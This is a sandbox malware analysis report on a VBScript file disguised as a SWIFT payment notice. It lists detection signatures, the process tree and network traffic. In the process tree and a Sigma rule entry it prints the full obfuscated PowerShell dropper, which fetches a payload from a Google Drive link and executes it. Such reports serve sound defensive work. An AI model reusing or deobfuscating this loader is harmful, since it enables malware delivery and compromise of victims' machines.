Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
e-dekont_swift-details.vbs

Overview

General Information

Sample name:e-dekont_swift-details.vbs
Analysis ID:1430130
MD5:0e0c52158e1cba6703c6456335cf228e
SHA1:e79505cdd6282f492c37e632239f0a7fc8324bd4
SHA256:fc7408dea9e0199b472661201fa866e1bf65e7a7d249b5b9e66f036efff85ab1
Tags:geoTURvbs
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 3236 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\e-dekont_swift-details.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1132 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Koldblodig = 1;$Arbejdskatalogs119='Substrin';$Arbejdskatalogs119+='g';Function Hungerless($Besnakkelsen){$Phylloxerae=$Besnakkelsen.Length-$Koldblodig;For($Monsterhood=5; $Monsterhood -lt $Phylloxerae; $Monsterhood+=(6)){$Apadana+=$Besnakkelsen.$Arbejdskatalogs119.Invoke($Monsterhood, $Koldblodig);}$Apadana;}function toptekster($Hypoglottis){& ($Formode) ($Hypoglottis);}$Ahistoric=Hungerless ' Af,rM,ithsoUnconzdesigi,sperlSparelOut,oaDelim/ Neur5Armag.Sinds0.nven Tanta( FlytW CramidriftnTyphadSurreoFueliw SammsSek,u feathNBromdTSkval Bandc1over 0Ejend. M.nn0,ooln;Torde FishWDual iLaighnun.on6 Pudr4Stvfn;Chrom Stivexdebar6Grsni4Famul;Dib e forudrKoralvOveri:Ku ib1Unawa2Befar1S.lva.Gri n0aeroc)Jordo DelkrGInvaleGuiltc LoddkFlueno Skat/Zooli2Desme0Milit1Morib0Biote0Afdra1Dicty0Summa1 Omni UdtaFSk lei NotorSharpeUntonf Dybso TerexZo ie/ Gdni1Hyper2Oscil1 Tvr .Pitch0Palin ';$Opvurderings=Hungerless 'pro,hUUnexpsAlthieBrugerV nys-OvertA Pal ghlf,ieFantan.uscut,craz ';$Sadelmagervrkstedet=Hungerless 'Dekr.hTaph tDemodtCir.epGrindsSciss:Fri s/Kalci/Leucrd Sul,rForskiTa brvbrewseSrgef.SockmgAftllose geoTransg TukalSupere Alk..Mercuc Udg o.djunm Plur/ FotouBeboecForsa?Se,laeSjuskxE,glipImmisoChangrSlukntKivin=Haustd AlleoMa,ilw .unlnSyrinlSoluroEjendaS,ruedConti&,mfariMglerdB,han=Fladb1MysidN FlorwSensaQShopplHaandXOrrancOverlqLegenB SaraSI,munLmo thzAnap RUn crRNrtfofProtofStere6Bespap G,ll4ArsenA MultYWhynePFasciKLunkhP Be,iRSpirauWasse2MelleG,nsil0Grund8.ombi-Kr bsiEctroTLag.i ';$Inddelingens=Hungerless ' Insp>Pi,na ';$Formode=Hungerless 'Maalei ti,leSw epxSatel ';$Unpark147='Inferiority197';toptekster (Hungerless 'ErnriS NonseForhat,aden- Mi,rCObjeko H dfn hypntSupereAccornVarsetIn,la Super-mass.PSlutnaApophtUntrahdek,n DragT Unen:Frilu\KlitoG Brugi SablgSubsahNilleeHakni. Se,gtund sxLimstt H,ls Mass-AnnyuV Eneta tyrl K,onuNonprePo er Bourg$EvovaUBankrnRomanpSjoveaSkotsrUrostku hum1Broc,4Marin7Wishe;signa ');toptekster (Hungerless 'Pris.iFllesf.sbes Udkra( kerot FewdeHofdesMispotSnowm- Fo.lpTimw.aundebtWelteh All. SuleTEtnol:Delit\g rniGPendlibladfg I tehprocoeHamul.ColletBladexAfsvrtP,rag)pr,ck{Ur.ereStepdxTypotiFolket Bord}Myoso;Rack, ');$Lntillgs = Hungerless 'Longee.takncCa,nohZooloo Moor Anded%NeugraArtisppremipWe,tedDe roa Bol.t belnaBrdty% Gibr\IndtakT knoaPyr prAmbilt frysoDigittO.traeSterikAutoms Fienk serro mbrerdis utLufttsHa,nd.ForsvVHemidr A,trd Male Ring&Urbic&T.ecl telefe Sproc,enneh ,ustoBlesk Vigor$Sider ';toptekster (Hungerless 'Tar.a$FlathgFiflklOutguoWon,sbFelesaoverflCar,o:rnefoRBurniaTonefaMet.odSystesQuitcl Torta Stopaned.aeSp,ratDatan=Ca am( SkrecRadikmG.ssydPerif Afma/OttincJacke Gylde$VitriLBely.nLucilt RangiLa.unl PrimlPreteg K.ics Neot)Rec t ');toptekster (Hungerless ' ond$.lejlgO,poslPriksoRestebSpillaEmballAdept:FightVSmutve,ubstrTrad,mOrtogi avorl BiceiHackbnRnkeng PietuE,ecteO,nersKu st=Be jl$DeklaSmart,aRefredEs,ereNe erl Ve.tm .ekla Blotg UsdeeIndverForstvAmanurNubi.k EutrsGigabt UnsceStilndDeliqe PrectPicad.WholesSalpiphen,elOra,giOv rstDanma( B.fa$NovicI uashnSammedStab.dbrydneCirculTelepiWinnonMe,degUnabre B.acn DefusProgr) D,al ');$Sadelmagervrkstedet=$Vermilingues[0];toptekster (Hungerless 'Ti ss$VandigFemkal Coy.oF.stebH.alia Win lGenne:Spe.iFGrap.uStav nOp,hakNonent SaliiSkraaoHystenOve fs Se faNonsofBlondpmyelirUucpnvTawn.nVestri AnagnBepl gPendre H,inngustesarvea=OutstNKorr.eReinswSprin-.artyOHilstb Tripj,vereespildc,enzotTjats DinerSPr.jnySpisesKlerktPartheCangim.enin.tamm N.aimae Spist Supe.TumblW ForteMes,ibAf.adCSte mlFireaiFolkeeE,pulnUafhatMelle ');toptekster (Hungerless 'Atomd$ StivFRverhu .esynUd,ikkbilletun.aci unjoAn,manBoa.lsDkadra,eaktf,atiop heffr MalevEntomnHookaiSierrnA utegRe ise ambrnTyggesAr.er.BenovH H rteV,teraHydr,d Mekae.educrudko.s Tan,[Vand,$ArionOStrejpTils.v Pre uNonderRemitd PhileLysaarDespeiF,dtun Par.gExtersfron ]gra,e=.eren$YahunACorreh PreeiMin.tsKonkrtKnfrioAnskurChorei upec aryt ');$Sandfangene=Hungerless ' dkmpFBusl,uHesten,ndosk F dntPurgaiBouleo GlownkommesWishlaStratfSvi,epAchror,reenv Allon ChiniAgonin s opgCompueOmvltn BiotsRegre.Dyst D IndioUnselwOuvernh tudlBat,uo FiniaCoonidForevF ParaiDeaktlkvg neSprag(Outmo$TidsfS PreaaDansed ,rtseIrremlOrkanm Friea orsogFlooreArbejr Emesv AnderElektkSpildsTrykktRaas.e ,kildAnateeDeca t Fred, rklr$R.bbeKAstrolVestsa SsonmDoetmmVa.ske,uxocralko.nN.okee DegesGeuma)Ferio ';$Sandfangene=$Raadslaaet[1]+$Sandfangene;$Klammernes=$Raadslaaet[0];toptekster (Hungerless 'Ophth$ G,legOxblolsubvioNymphbW lfwasus,nlInval:un.asNStal,oSphenn PlancBoussa AfkarAudiotLambke DeadlJaguaiDekomzUreteeTone.dDingesRifer=Kredi(revolTPigene rkaisMletktSporv-RecipP BrasaStanzt pekth Tend Sk dt$Di.krKOradblAn.peaT.stsmTordimUncree arsirDdspanBrevde BandsBirnm)Philo ');while (!$Noncartelizeds) {toptekster (Hungerless 'Ameto$Kol,egRkkehlOprejoperinblkassa,ienolAande:PurpeTHexahi hvill D.oxb Wordakr.tkgchatte indfReprsrAmiabs,loakeretn lBaku s Me s=Blads$P.nthtOffenrVideruWooleeProgr ') ;toptekster $Sandfangene;toptekster (Hungerless 'AntiqSse,rtt .anda,umerrUdsugtMirac-Mi,caSsa,nslWencke.elleeMutu pPin,a Fors.4Fresi ');toptekster (Hungerless 'Comid$Histog Sugel Torpo,gelibRad oa Fronl Uncl:Laur.NArkfdo Vurdn ,oencCopriaDeossrJoypotBrnepeIlseblIntr.iHieroz lageRun edBeanesStyri=,iske(Vaag,TButcheVerd.sHymnetFront-reklaP,ksema,ogittUns ohKont, Bilbo$indskKSkalalInfarasl,tamfly,em.aarnedistir Surcndi.cue Fatts Resp)reple ') ;toptekster (Hungerless 'R,gis$Engagg .inylErhveoSom.sbG,adya skollThr.a:.lappOAmy,op ,orlsLingui Upwag AffreDk man ValedPartiemiliessubvo=Distr$SkuedgWo.drlAvi,noPyranbVict.aToboglEska.:CrossSStrukpArbeji ChocrRestaaRo,anlYder.fFidusjSulfoeRecrudRe ideForfrrPreste ForsnEvneds s,nd+Figur+Un,ut%A,rod$ VedeV Siphe Icter G,mnmGeri,iPr,shlOutcuiDelren SootgSchwauchorieEfters B at.Frstecsup rofantauStensn M.lltOve.m ') ;$Sadelmagervrkstedet=$Vermilingues[$Opsigendes];}toptekster (Hungerless 'Konde$T,rbigOakuml ReimoAutombSesquaTo,etl rei :T upeIMyst,nBonittup,pleDragsr GlykmKundseCass zM rgizTrysto HaptsProsc ,ass=Sodde StokrGHondpeLentitTil t-InterCInd.eo Primn olastHonn eNonbunRerattTreho Kvet$Ca spKBespnlDistraBontemHolopmUncone LuftrLouizn OprueTak esRee,l ');toptekster (Hungerless 'Brike$Billeg Kni l ,onsomariobProfuaGastal Fast:Mug,ehIsdesywanwep silueSjl arProtolJe oroBirdlgNucleiPiestcStictaAffall Kaffi,rogrtKlu.cyUd.ta Agte=Tilhu Showi[ prodSA.ekkyvarefs S.aatVi dee H,enm unpo.ForsiCP.ylloSpermnUkuravSu.maePericrSidegtMisd.]Zinkk: ulbj:DiallFSpndhr Vin,osmaasm ,ithB nteaExc,usSterieSpege6R ind4BetroS SurgtFormar No ei,kurknRaadigCello(D.mor$Koty.IbygninEva.utAgaveeinstirDiatomBut.eeBanenzElvrkzomstno SkinsSpalt)vejle ');toptekster (Hungerless ' Neap$PipikgGallelSeparo,riesbMet,daBnnesl Vome:BurguG SchmrGeokeaLnud,a Overlh kseiUtilbgBuffe lokk=skrek Marin[,nvirSunidey nvessTricrt Forpe windm Stik. Ulv TSide,eSubofxChac.tKorpu.Afma.ESeparn ynancM.rahoGrunddReen.i U,denAalbogUopsl]Fusta:Ru,my:DelikAKaldeSFunktCTankeIMacroILards.NonflGHang,e FaldtHalvdSam notHypnor IndeiTredknOpdrigMtaa,(Humou$presbh ,oenyBaad.pScrubeRisotrKilldlBlan.o Ger.gOversiGenercTr.vra FrdilArchaiFishmt.ryseyU amb)Perth ');toptekster (Hungerless 'Uncoh$M.lligSprn.l Sa moKo.mabKvaliaFor.klPa.ne:OmvenD skovi TidevIntereMiljrrGerfasTuli.iBenchf bbediLan se Kn,cdSorte=Subti$PantoGInsurrGinglaLilleaAccesl Almei S bsgmorga. BewesUlsteu Mu.tbZickasHa.vdtForm rMonopi Ca.dnScr wg Dags( F,jl2Indfa8 emil5 Grun0Ankr 8Sen.i7Ble d,devov3,nder0Turna1 mano4 rsta6Fortr).tort ');toptekster $Diversified;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6124 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\kartotekskorts.Vrd && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 1132INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x28200a:$b2: ::FromBase64String(
  • 0x282049:$b2: ::FromBase64String(
  • 0x282089:$b2: ::FromBase64String(
  • 0x2820ca:$b2: ::FromBase64String(
  • 0x28210c:$b2: ::FromBase64String(
  • 0x28214f:$b2: ::FromBase64String(
  • 0x282193:$b2: ::FromBase64String(
  • 0x2821d8:$b2: ::FromBase64String(
  • 0x28221e:$b2: ::FromBase64String(
  • 0x282265:$b2: ::FromBase64String(
  • 0x2822ad:$b2: ::FromBase64String(
  • 0x2822f6:$b2: ::FromBase64String(
  • 0x282340:$b2: ::FromBase64String(
  • 0x28238b:$b2: ::FromBase64String(
  • 0x282480:$b2: ::FromBase64String(
  • 0x284208:$b2: ::FromBase64String(
  • 0x284cad:$b2: ::FromBase64String(
  • 0x284d2e:$b2: ::FromBase64String(
  • 0x512a5:$s1: -join
  • 0x51a3f:$s1: -join
  • 0x9fc77:$s1: -join

Other

SourceRuleDescriptionAuthorStrings
amsi64_1132.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x10287:$b2: ::FromBase64String(
  • 0xd5f2:$s1: -join
  • 0x6d9e:$s4: +=
  • 0x6e60:$s4: +=
  • 0xb087:$s4: +=
  • 0xd1a4:$s4: +=
  • 0xd48e:$s4: +=
  • 0xd5d4:$s4: +=
  • 0xf81f:$s4: +=
  • 0xf89f:$s4: +=
  • 0xf965:$s4: +=
  • 0xf9e5:$s4: +=
  • 0xfbbb:$s4: +=
  • 0xfc3f:$s4: +=
  • 0xdd08:$e4: Get-WmiObject
  • 0xdef7:$e4: Get-Process
  • 0xdf4f:$e4: Start-Process

Sigma Signatures

System Summary

barindex
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\e-dekont_swift-details.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\e-dekont_swift-details.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\e-dekont_swift-details.vbs", ProcessId: 3236, ProcessName: wscript.exe
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\e-dekont_swift-details.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\e-dekont_swift-details.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\e-dekont_swift-details.vbs", ProcessId: 3236, ProcessName: wscript.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Koldblodig = 1;$Arbejdskatalogs119='Substrin';$Arbejdskatalogs119+='g';Function Hungerless($Besnakkelsen){$Phylloxerae=$Besnakkelsen.Length-$Koldblodig;For($Monsterhood=5; $Monsterhood -lt $Phylloxerae; $Monsterhood+=(6)){$Apadana+=$Besnakkelsen.$Arbejdskatalogs119.Invoke($Monsterhood, $Koldblodig);}$Apadana;}function toptekster($Hypoglottis){& ($Formode) ($Hypoglottis);}$Ahistoric=Hungerless ' Af,rM,ithsoUnconzdesigi,sperlSparelOut,oaDelim/ Neur5Armag.Sinds0.nven Tanta( FlytW CramidriftnTyphadSurreoFueliw SammsSek,u feathNBromdTSkval Bandc1over 0Ejend. M.nn0,ooln;Torde FishWDual iLaighnun.on6 Pudr4Stvfn;Chrom Stivexdebar6Grsni4Famul;Dib e forudrKoralvOveri:Ku ib1Unawa2Befar1S.lva.Gri n0aeroc)Jordo DelkrGInvaleGuiltc LoddkFlueno Skat/Zooli2Desme0Milit1Morib0Biote0Afdra1Dicty0Summa1 Omni UdtaFSk lei NotorSharpeUntonf Dybso TerexZo ie/ Gdni1Hyper2Oscil1 Tvr .Pitch0Palin ';$Opvurderings=Hungerless 'pro,hUUnexpsAlthieBrugerV nys-OvertA Pal ghlf,ieFantan.uscut,craz ';$Sadelmagervrkstedet=Hungerless 'Dekr.hTaph tDemodtCir.epGrindsSciss:Fri s/Kalci/Leucrd Sul,rForskiTa brvbrewseSrgef.SockmgAftllose geoTransg TukalSupere Alk..Mercuc Udg o.djunm Plur/ FotouBeboecForsa?Se,laeSjuskxE,glipImmisoChangrSlukntKivin=Haustd AlleoMa,ilw .unlnSyrinlSoluroEjendaS,ruedConti&,mfariMglerdB,han=Fladb1MysidN FlorwSensaQShopplHaandXOrrancOverlqLegenB SaraSI,munLmo thzAnap RUn crRNrtfofProtofStere6Bespap G,ll4ArsenA MultYWhynePFasciKLunkhP Be,iRSpirauWasse2MelleG,nsil0Grund8.ombi-Kr bsiEctroTLag.i ';$Inddelingens=Hungerless ' Insp>Pi,na ';$Formode=Hungerless 'Maalei ti,leSw epxSatel ';$Unpark147='Inferiority197';toptekster (Hungerless 'ErnriS NonseForhat,aden- Mi,rCObjeko H dfn hypntSupereAccornVarsetIn,la Super-mass.PSlutnaApophtUntrahdek,n DragT Unen:Frilu\KlitoG Brugi SablgSubsahNilleeHakni. Se,gtund sxLimstt H,ls Mass-AnnyuV Eneta tyrl K,onuNonprePo er Bourg$EvovaUBankrnRomanpSjoveaSkotsrUrostku hum1Broc,4Marin7Wishe;signa ');toptekster (Hungerless 'Pris.iFllesf.sbes Udkra( kerot FewdeHofdesMispotSnowm- Fo.lpTimw.aundebtWelteh All. SuleTEtnol:Delit\g rniGPendlibladfg I tehprocoeHamul.ColletBladexAfsvrtP,rag)pr,ck{Ur.ereStepdxTypotiFolket Bord}Myoso;Rack, ');$Lntillgs = Hungerless 'Longee.takncCa,nohZooloo Moor Anded%NeugraArtisppremipWe,tedDe roa Bol.t belnaBrdty% Gibr\IndtakT knoaPyr prAmbilt frysoDigittO.traeSterikAutoms Fienk serro mbrerdis utLufttsHa,nd.ForsvVHemidr A,trd Male Ring&Urbic&T.ecl telefe Sproc,enneh ,ustoBlesk Vigor$Sider ';toptekster (Hungerless 'Tar.a$FlathgFiflklOutguoWon,sbFelesaoverflCar,o:rnefoRBurniaTonefaMet.odSystesQuitcl Torta Stopaned.aeSp,ratDatan=Ca am( SkrecRadikmG.ssydPerif Afma/OttincJacke Gylde$VitriLBely.nLucilt RangiLa.unl PrimlPreteg K.ics Neot)Rec t ');toptekster (Hungerless ' ond$.lejlgO,poslPriksoRestebSpillaEmballAdept:FightVSmutve,ubstrTrad,mOrtogi avorl BiceiHackbnRnkeng PietuE,ecteO,nersKu st=Be jl$DeklaSmart,aRefredEs,ereNe erl Ve.tm .ekla Blotg Us

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
Multi AV Scanner detection for submitted file
Source: e-dekont_swift-details.vbsVirustotal: Detection: 11%Perma Link
Source: unknownHTTPS traffic detected: 142.250.65.174:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.65.225:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: Binary string: e.pdb#K source: powershell.exe, 00000002.00000002.2193820727.0000017EB8F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb`T]e source: powershell.exe, 00000002.00000002.2241435011.0000017ED30F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Target.pdbion* 1TX]d source: powershell.exe, 00000002.00000002.2241435011.0000017ED30F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000002.00000002.2240977013.0000017ED2E9B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241435011.0000017ED30C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbK source: powershell.exe, 00000002.00000002.2240977013.0000017ED2E9B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2241435011.0000017ED30F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbo source: powershell.exe, 00000002.00000002.2240977013.0000017ED2E9B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdb|XEd source: powershell.exe, 00000002.00000002.2241435011.0000017ED30F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb^C source: powershell.exe, 00000002.00000002.2241435011.0000017ED30F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2241435011.0000017ED30C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbip source: powershell.exe, 00000002.00000002.2241435011.0000017ED30F6000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1NwQlXcqBSLzRRff6p4AYPKPRu2G08-iT HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /download?id=1NwQlXcqBSLzRRff6p4AYPKPRu2G08-iT&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1NwQlXcqBSLzRRff6p4AYPKPRu2G08-iT HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /download?id=1NwQlXcqBSLzRRff6p4AYPKPRu2G08-iT&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: unknownDNS traffic detected: queries for: drive.google.com
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBCB97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBAED8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.2222207456.0000017ECAB40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2222207456.0000017ECA9FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBABB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBA991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBABB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBA991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBAEB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAF1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAED0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000002.00000002.2222207456.0000017ECA9FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2222207456.0000017ECA9FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2222207456.0000017ECA9FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBC9CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googPR2
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBABB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBC9CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000002.00000002.2240977013.0000017ED2E9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1NwQlXcqBSLzRRff6p4AYPKPRu2G08-iT32
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBABB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1NwQlXcqBSLzRRff6p4AYPKPRu2G08-iTP
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBAED0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBAED0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1NwQlXcqBSLzRRff6p4AYPKPRu2G08-iT&export=download
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBABB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBBD4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro0
Source: powershell.exe, 00000002.00000002.2222207456.0000017ECAB40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2222207456.0000017ECA9FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBAEB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAF1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAED0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBAEB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAF1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAED0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBAEB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAF1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAED0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
